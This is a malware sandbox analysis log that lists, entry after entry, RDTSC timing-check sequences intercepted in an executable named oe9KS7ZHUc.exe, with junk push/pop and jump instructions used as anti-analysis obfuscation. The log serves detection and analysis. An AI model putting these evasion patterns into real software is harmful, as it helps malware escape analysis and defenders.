              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2BC29 second address: B2BC42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD845024963h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2BC42 second address: B2BC4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD84520DEEEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B30EFA second address: B30F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B30F02 second address: B30F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B30F0A second address: B30F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3B2CA second address: B3B2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 jl 00007FD84520DEE6h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007FD84520DEE6h 0x00000017 jmp 00007FD84520DEF9h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3B8A1 second address: B3B8A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3B8A7 second address: B3B8C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD84520DEE6h 0x00000008 je 00007FD84520DEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FD84520DEEEh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C1AE second address: B3C1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C1B4 second address: B3C1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C1B8 second address: B3C1D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84502495Bh 0x00000007 jno 00007FD845024956h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FD84502495Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C473 second address: B3C492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD84520DEF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C492 second address: B3C497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C497 second address: B3C4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD84520DEE6h 0x0000000a popad 0x0000000b jmp 00007FD84520DEF8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD84520DEEAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C4CB second address: B3C4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C791 second address: B3C7B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B3C7B3 second address: B3C7CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024967h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40C02 second address: B40C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40C0C second address: B40C3E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD845024956h 0x00000008 jmp 00007FD845024965h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 je 00007FD845024956h 0x0000001a jbe 00007FD845024956h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40C3E second address: B40C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40C49 second address: B40C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4027A second address: B40289 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD84520DEEAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40289 second address: B4028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B403D2 second address: B403DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B407B6 second address: B407C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD845024956h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B407C0 second address: B407CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FD84520DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B407CC second address: B407E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD845024966h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B407E6 second address: B407EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40939 second address: B40943 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD845024956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40943 second address: B40949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B40949 second address: B4094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4F913 second address: B4F926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD84520DEE6h 0x0000000a pushad 0x0000000b jng 00007FD84520DEE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4F926 second address: B4F937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD845024956h 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4F937 second address: B4F93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4F93B second address: B4F94F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD845024956h 0x00000008 jns 00007FD845024956h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: A976AB second address: A976AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4E4C0 second address: B4E4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD845024956h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4E4CF second address: B4E4F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FD84520DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD84520DEF9h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4E4F8 second address: B4E50C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024960h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B4F7D9 second address: B4F7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B561C6 second address: B561CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B561CC second address: B561F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84520DEEEh 0x00000009 jmp 00007FD84520DEF2h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B57871 second address: B57875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B638F8 second address: B6390E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pushad 0x0000000e jp 00007FD84520DEE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B6390E second address: B63915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B63360 second address: B63366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B6349D second address: B634A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B634A1 second address: B634BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FD84520DEF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B634BB second address: B634C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B634C1 second address: B634D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84520DEF2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B634D9 second address: B634DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B71662 second address: B71666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B71666 second address: B71698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD845024968h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 jnp 00007FD845024958h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B79C86 second address: B79C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jns 00007FD84520DEE6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B7E539 second address: B7E53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B7E53D second address: B7E541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B7E541 second address: B7E54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FD84502495Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B7E3F1 second address: B7E3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD84520DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B82F77 second address: B82F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD845024956h 0x0000000a pop eax 0x0000000b jmp 00007FD845024968h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8785C second address: B8786D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84520DEEDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8786D second address: B8788A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD845024963h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8788A second address: B8788F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B881E9 second address: B881EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B881EF second address: B88236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007FD84520DEFDh 0x0000000b jmp 00007FD84520DEF5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FD84520DEF2h 0x0000001b jns 00007FD84520DEE6h 0x00000021 jng 00007FD84520DEE6h 0x00000027 jmp 00007FD84520DEF0h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B88236 second address: B8824C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024960h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8824C second address: B88252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B88252 second address: B88256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8DC58 second address: B8DC5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8DC5D second address: B8DC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FD845024961h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FD845024968h 0x00000016 jmp 00007FD845024962h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e je 00007FD845024956h 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B8DE08 second address: B8DE0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC30B1 second address: BC30C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84502495Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC1F50 second address: BC1F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 jnc 00007FD84520DF3Dh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC224F second address: BC2266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD845024962h 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC2AEF second address: BC2AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FD84520DEE6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC2C91 second address: BC2C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC2DE3 second address: BC2DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC2DED second address: BC2DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC2DF4 second address: BC2DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC472F second address: BC4736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC4736 second address: BC473C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC473C second address: BC4748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC703A second address: BC703E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC7376 second address: BC737A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC737A second address: BC7380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC7380 second address: BC738A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD845024956h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC738A second address: BC73ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jp 00007FD84520DEFBh 0x00000012 jmp 00007FD84520DEF5h 0x00000017 nop 0x00000018 mov edx, esi 0x0000001a mov dword ptr [ebp+12472235h], eax 0x00000020 push 00000004h 0x00000022 mov dword ptr [ebp+122D3CDCh], eax 0x00000028 call 00007FD84520DEE9h 0x0000002d push eax 0x0000002e push edx 0x0000002f js 00007FD84520DEF1h 0x00000035 jmp 00007FD84520DEEBh 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC73ED second address: BC73F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC73F3 second address: BC73F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC73F7 second address: BC7418 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD845024966h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC7759 second address: BC7769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FD84520DEE6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC7769 second address: BC776F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BC8D25 second address: BC8D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BCACDF second address: BCACE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: BCACE5 second address: BCACEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
